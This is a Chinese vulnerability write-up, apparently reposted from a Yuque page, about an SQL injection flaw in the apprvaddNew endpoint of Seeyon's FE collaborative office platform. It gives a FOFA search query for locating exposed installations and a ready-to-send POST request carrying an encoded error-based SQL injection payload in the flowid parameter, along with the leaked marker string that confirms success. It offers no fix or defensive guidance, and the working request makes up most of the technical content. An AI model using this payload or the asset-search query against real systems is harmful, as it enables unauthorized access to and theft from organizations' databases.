登录 白背景
源码

致远互联FE协作办公平台apprvaddNew存在SQL注入漏洞

一、漏洞简介

北京致远互联软件股份有限公司致远互联FE协作办公平台<font style="color:rgb(38, 38, 38);">apprvaddNew</font>存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

  • 致远互联-FE协作办公平台

三、资产测绘

  • fofaapp="致远互联-FE"
  • 特征

1698659959745-2fa812d0-dff6-4e46-9a5a-d5060f83756a.png

四、漏洞复现

POST /witapprovemanage/apprvaddNew.j%73p HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

flowid=1%27%2B%28SELECT+CHAR%2880%29%2BCHAR%28102%29%2BCHAR%2879%29%2BCHAR%2887%29+WHERE+2368%3D2368+AND+4817+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%284817%3D4817%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%2898%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28113%29%29%29%29%2B%27

1721628601791-bb000435-09cd-49bf-abc8-a51d25a70721.png

qzjxq1qbjzq

1721628613544-d2a29576-f564-4adf-857b-295670a109be.png

原文: https://www.yuque.com/xiaokp7/ocvun2/fmdl9lfwxzor18n6